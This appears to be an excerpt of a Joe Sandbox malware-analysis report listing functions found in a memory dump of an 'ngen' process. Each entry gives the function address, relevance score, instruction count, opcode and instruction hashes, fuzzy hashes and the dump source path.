                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cd12cc41e3699aca44b46d1849957dd1c0799aff1344dc4cbf49ec06d10e6e1
                                                                                                                      • Instruction ID: f63d1380b7a255c1259c11e7d35b6af3c3ee756793d4cace8a6842882895e4b3
                                                                                                                      • Opcode Fuzzy Hash: 6cd12cc41e3699aca44b46d1849957dd1c0799aff1344dc4cbf49ec06d10e6e1
                                                                                                                      • Instruction Fuzzy Hash: B9516C75210A04DFCB21EF65C988F6AB7FEFF44740F500929E95697260D730E950EB60
                                                                                                                      Function 05737152 Relevance: .2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dda60ffd3fe381edc05338e2f402e20343a3e6b8a5f6e7e8b96f687bef037484
                                                                                                                      • Instruction ID: 6c0e822aa82f08a379e8e4bf1dc8a8b0c82baa58ab9d9aa51c0a580e40306e9c
                                                                                                                      • Opcode Fuzzy Hash: dda60ffd3fe381edc05338e2f402e20343a3e6b8a5f6e7e8b96f687bef037484
                                                                                                                      • Instruction Fuzzy Hash: 4D510476A10606EFDF19DF64C849BBDBBB6FF44321F104069E80393290EB749A11EB91
                                                                                                                      Function 057545B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                      • Instruction ID: 6746178bfddd322250f18a65974f83766c21c452015513d7416fc10d9081ab83
                                                                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                      • Instruction Fuzzy Hash: D6518F71E04219AFCF15DFA4D844BEEBBB6EF45360F044069E905AB240D7B4E984DBA0
                                                                                                                      Function 057351ED Relevance: .1, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02f5f37c9af66c4b6d1aabd4b9a5e27244b4d87aec9c0cd0d106c03ac7e3d611
                                                                                                                      • Instruction ID: d0663895707fca83f9ec8b3806a2fc7b1dd04332c30e5d3617dc343f3bb2002b
                                                                                                                      • Opcode Fuzzy Hash: 02f5f37c9af66c4b6d1aabd4b9a5e27244b4d87aec9c0cd0d106c03ac7e3d611
                                                                                                                      • Instruction Fuzzy Hash: DB51AD71B15215DFDF25DBA9D84AFBDB7B1BF08728F100018E812E7242DBB5A940EB61
                                                                                                                      Function 0576F71F Relevance: .1, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dd4eab19a6728c71195e4a69558f9c2c824ce62fe9a1a9c52083a46b3e186fd4
                                                                                                                      • Instruction ID: 39fceb577d25228fa600675fbcbe1e6542f9e23688ca5c92395b4f990e2c18d1
                                                                                                                      • Opcode Fuzzy Hash: dd4eab19a6728c71195e4a69558f9c2c824ce62fe9a1a9c52083a46b3e186fd4
                                                                                                                      • Instruction Fuzzy Hash: 82417472E04229AFCB26DBA49848EBFB6BDAF04650F450566ED05E7204D734DE00EBE5
                                                                                                                      Function 058035D7 Relevance: .1, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                      • Instruction ID: 4e89e261b9ed48dff8bba1fc6c92012398ca7450601efc7f775ec5ed5dbc4b12
                                                                                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                      • Instruction Fuzzy Hash: F7517A7160060AEFCB56CF54C984A66BBB6FF45308F1584BAE808DF262E771ED45CB90
                                                                                                                      Function 0573D534 Relevance: .1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 53c41beda8d0b5f058191318b4889e31f31b969172fd3ff945c25147ac7dd057
                                                                                                                      • Instruction ID: 93fe89b8e57d92418434f6a9368b4562e64dbd1dce98aa38d640de31f9e2cabd
                                                                                                                      • Opcode Fuzzy Hash: 53c41beda8d0b5f058191318b4889e31f31b969172fd3ff945c25147ac7dd057
                                                                                                                      • Instruction Fuzzy Hash: 8D51CE72708690CFCB25CB19D448F6A73E6FB44BA4F0908A5F8168B692D738DC40EB61
                                                                                                                      Function 057601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45a10055cbf1b99ad3fca4326c5e72573012fabe7fc53bf5d61940e49d45d2ba
                                                                                                                      • Instruction ID: 9c467ed88f4022fc564fbb45c168b0ae682f3e0a1712c6da9799f02a01c79d8a
                                                                                                                      • Opcode Fuzzy Hash: 45a10055cbf1b99ad3fca4326c5e72573012fabe7fc53bf5d61940e49d45d2ba
                                                                                                                      • Instruction Fuzzy Hash: 0641BE36A01219DBCB14DF99C448AEEB7B5BF88710F14826EEC16F7240D735AD41EBA4
                                                                                                                      Function 05772750 Relevance: .1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction ID: 15f152d70dd11111b85372a763aaf7895acf7a9bc1e6ac5b0e01244e8459fdcf
                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction Fuzzy Hash: CF515D76E00615DFCB14CF98C584AAEF7B2FF84710F2482A9D816A7750D730AE82DB90
                                                                                                                      Function 057AD1C0 Relevance: .1, Instructions: 135COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction ID: 11642cbdb9b486932a205be16a9c2a8549022b14f3b1940866c2ee9a08f731dc
                                                                                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction Fuzzy Hash: 98512A76A04205DFCB18CF68C581AA9BBF1FF88314B14866ED81AD7745E734EA50DF90
                                                                                                                      Function 05736154 Relevance: .1, Instructions: 133COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 62c04b6bc7b9266ecfdeceae02494120151b63fbbdb5d36664ff5c021e9c0b81
                                                                                                                      • Instruction ID: 1c9ec03732cd270dd4ddacb5561a92fd3707acf1c3b72f240e74b5d9defb5197
                                                                                                                      • Opcode Fuzzy Hash: 62c04b6bc7b9266ecfdeceae02494120151b63fbbdb5d36664ff5c021e9c0b81
                                                                                                                      • Instruction Fuzzy Hash: 8E51E770A04556ABDB25DB64CC0DFB8BBB2FF05324F1482A5D529976C2EB345981EF80
                                                                                                                      Function 0572B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cb1c8d1ae6e9b1670fb2128930d7dd8b1a2c399cbb095c6a912adf13207afe54
                                                                                                                      • Instruction ID: 17aa916d91c49302e8f906d50b3ac150c9101e345ea99483ffa0ec0fa2bcbea5
                                                                                                                      • Opcode Fuzzy Hash: cb1c8d1ae6e9b1670fb2128930d7dd8b1a2c399cbb095c6a912adf13207afe54
                                                                                                                      • Instruction Fuzzy Hash: 95416D71680711EFDB22EF65C988F2ABBE9FB04794F048469E9159B250E770DC40EFA0
                                                                                                                      Function 057F866E Relevance: .1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction ID: 4f6e38de26a09b095684dbc529f00fe6146ecfa7d71a8e7a6e45115b676d1099
                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction Fuzzy Hash: A541B275B00205AFDB15DF99CC89BBFBBBABF88600F144069EA05A7341DB70DD01A7A1
                                                                                                                      Function 0575A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ebc136fb7d31669315c694d41bac54da6423129cee72ba3f4f98b5fc8c79b81d
                                                                                                                      • Instruction ID: aa862aebfdecffc90608a9d19dbf81278852c4066cb81fe0dcf923fc7ade691f
                                                                                                                      • Opcode Fuzzy Hash: ebc136fb7d31669315c694d41bac54da6423129cee72ba3f4f98b5fc8c79b81d
                                                                                                                      • Instruction Fuzzy Hash: B941D031A58204CFCF25DF68D494BAD7BB1FB48361F144265EC12BB291DB74A940EFA0
                                                                                                                      Function 0575D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23eb2ac33aa0dc62264872a932612c9d9b562cbe12a6466dd58fec9ddfeabfad
                                                                                                                      • Instruction ID: cf874b06d3c5141de8400031ebcd29d1f3cb107b62e75267ad63407b32a18555
                                                                                                                      • Opcode Fuzzy Hash: 23eb2ac33aa0dc62264872a932612c9d9b562cbe12a6466dd58fec9ddfeabfad
                                                                                                                      • Instruction Fuzzy Hash: 9541E3712142009FDB35EF25D899F6ABBA9FB44330F00452DFC15872A1DB30E941EBA1
                                                                                                                      Function 0572A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction ID: 45ac426eae019e54815942ed1dbb9b428091388b7222209e391a774383051c79
                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction Fuzzy Hash: 79414A71B04221DBCB30EE658448BBAB773FB50714F55806AE8498B240E7719D80FB91
                                                                                                                      Function 05760710 Relevance: .1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction ID: f1075459b7347d34481df550c33b9d1df2163dbdde37a604d682ffec195d2af4
                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction Fuzzy Hash: 46418D75A00705EFCB24CF98C988AAAB7F5FF18700B10496DE956D7250E330EA44DF91
                                                                                                                      Function 0573262C Relevance: .1, Instructions: 119COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6afde5df36377206f62f5fce020fbd060605da10fc45fa1f2b474b439610aad8
                                                                                                                      • Instruction ID: ffc7a56c5df7ac7d662bb664dac881e76f4ca22355634a58039d7f714af2f765
                                                                                                                      • Opcode Fuzzy Hash: 6afde5df36377206f62f5fce020fbd060605da10fc45fa1f2b474b439610aad8
                                                                                                                      • Instruction Fuzzy Hash: B741E475601714CFCB21EF29C94AB65BBF2FF44320F148169D9169B6A3EB309941EF41
                                                                                                                      Function 057B07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d5f3c521ac3c0d53384618bb1034e52f49b99de4d9e9710d07902c21710539f5
                                                                                                                      • Instruction ID: 4a20b6b5674a676090f5d6703e5de27422c6be8099af4b47a80e8ee303e4e88a
                                                                                                                      • Opcode Fuzzy Hash: d5f3c521ac3c0d53384618bb1034e52f49b99de4d9e9710d07902c21710539f5
                                                                                                                      • Instruction Fuzzy Hash: 04416171A143549FD720DF29C849B9BBBE8FF88754F004A2EF998D7250DB709904DB92
                                                                                                                      Function 057B05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c699ba089dce34bd9f7610a46c5f65c1750c2913e4f2b2179c1df4d50fec31a9
                                                                                                                      • Instruction ID: 1f091af190e910545cc89eafceffdf8632f9c6ff8f0ac3d4114ef593a7fbd15e
                                                                                                                      • Opcode Fuzzy Hash: c699ba089dce34bd9f7610a46c5f65c1750c2913e4f2b2179c1df4d50fec31a9
                                                                                                                      • Instruction Fuzzy Hash: 6141D0726087459FD320DF69D848BABB7E9BFC8700F040A29F89587680E770E914D7A6
                                                                                                                      Function 05735702 Relevance: .1, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 76f99e041af726aabec3df3ffc52304509094e22cbd38c48c427ee42a439fa80
                                                                                                                      • Instruction ID: a80e74c7d6975623191674b084624aa89fbd42b590cf9f8a8a4fa6687ebcbf25
                                                                                                                      • Opcode Fuzzy Hash: 76f99e041af726aabec3df3ffc52304509094e22cbd38c48c427ee42a439fa80
                                                                                                                      • Instruction Fuzzy Hash: 9A31B035311A06EFCB55AB24C989EA9FBA6FF44364F405025E94187A51DB70E920EFD0
                                                                                                                      Function 057550E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction ID: 9b724c7c38f03051e356cabb448f5f29634ac27e927481115e80e5a7c4d9756c
                                                                                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction Fuzzy Hash: EF31FC3171C3419BDB21DA28C804B67BBD6BB85764F08852DFC868B380E3B4DC41E7A2
                                                                                                                      Function 0572B480 Relevance: .1, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6d115197051b6095ed42890502760250b29e158682ad4ea97e9bdee9fec895ba
                                                                                                                      • Instruction ID: e5d5a9a9ce5df421364be115eaa9729fcf5c3b383b47b0a163ebf3d7da885ad6
                                                                                                                      • Opcode Fuzzy Hash: 6d115197051b6095ed42890502760250b29e158682ad4ea97e9bdee9fec895ba
                                                                                                                      • Instruction Fuzzy Hash: 0931F1726002149FC721EF15C884A667BA6FF84360F14826DFC494F291DB31ED42DBD0
                                                                                                                      Function 057F61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c11ce3a8b625ba38b84dfa44c756de6ef5340d44597f4175dbba164bc41528b9
                                                                                                                      • Instruction ID: fb66450835a8c9e8f0a2be7c1dfa259dec0bf17090bdf32552aef255712672f8
                                                                                                                      • Opcode Fuzzy Hash: c11ce3a8b625ba38b84dfa44c756de6ef5340d44597f4175dbba164bc41528b9
                                                                                                                      • Instruction Fuzzy Hash: CF31B076A00219EBDB15DFA8CC84FAEB7B6FB48B40F454169E901EB344D770AD40DBA4
                                                                                                                      Function 05729730 Relevance: .1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 71cf99629d8a5d50a1753a634591cd2da045561d0f252cc631dff0eec44102b6
                                                                                                                      • Instruction ID: ea6bb4814f7e9044dc486f9a8f1aa0259f67aa4fb5e60234d4ccc62b70fceff4
                                                                                                                      • Opcode Fuzzy Hash: 71cf99629d8a5d50a1753a634591cd2da045561d0f252cc631dff0eec44102b6
                                                                                                                      • Instruction Fuzzy Hash: 4B21D776A407249FC3329F59C404B2ABBF5FF94B50F190429EA559B740DB74EC41EB90
                                                                                                                      Function 057307AF Relevance: .1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdc5536589b225423354058429f74074600b4bc7f9adebe59561e8a12a80770f
                                                                                                                      • Instruction ID: 718f1454244766167c6088c24c77dfb80dc4d8d155b9f50bf383dd2314396d83
                                                                                                                      • Opcode Fuzzy Hash: cdc5536589b225423354058429f74074600b4bc7f9adebe59561e8a12a80770f
                                                                                                                      • Instruction Fuzzy Hash: C231A072A04611DBC712EE28888DEBBBBAAAF84670F014529FC5597211DB30DC11B7E1
                                                                                                                      Function 057F60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 057f22e8dda8195345fa4b8d8f3d142950c07b0615c1b7a861a712d7684d01cf
                                                                                                                      • Instruction ID: 7079f9aecb6f2cd89df8085d24f4848196afc26e347647f66d83b37efacb5866
                                                                                                                      • Opcode Fuzzy Hash: 057f22e8dda8195345fa4b8d8f3d142950c07b0615c1b7a861a712d7684d01cf
                                                                                                                      • Instruction Fuzzy Hash: 1531DF71B10615ABDF22DFA9CC54F7EBBBAAF44754F104069EA05DB351DA30EC00AB90
                                                                                                                      Function 05738550 Relevance: .1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4451830e9fa6200e8f049f5b50ea5f3dd5580abc92bcf8f7f4fd4ca7961f257
                                                                                                                      • Instruction ID: 75492998fd93288a558a56357865a53e084e22491f8fdd188b93dd920ebea7c5
                                                                                                                      • Opcode Fuzzy Hash: a4451830e9fa6200e8f049f5b50ea5f3dd5580abc92bcf8f7f4fd4ca7961f257
                                                                                                                      • Instruction Fuzzy Hash: 5931CC716093019FD725DF1AC841B2AB7E5FF88710F04496DF88A9B392D774E804DBA2
                                                                                                                      Function 0572D6AA Relevance: .1, Instructions: 93COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction ID: 0035cdb08f01fe14e74cf3dbba7321294daa821f0583a5c721929edd4a7c6eef
                                                                                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction Fuzzy Hash: 4031D536604224AFDB31DE54C888F6EB3B9EB84750F198429ED169B350D338DD41EB90
                                                                                                                      Function 057357C0 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
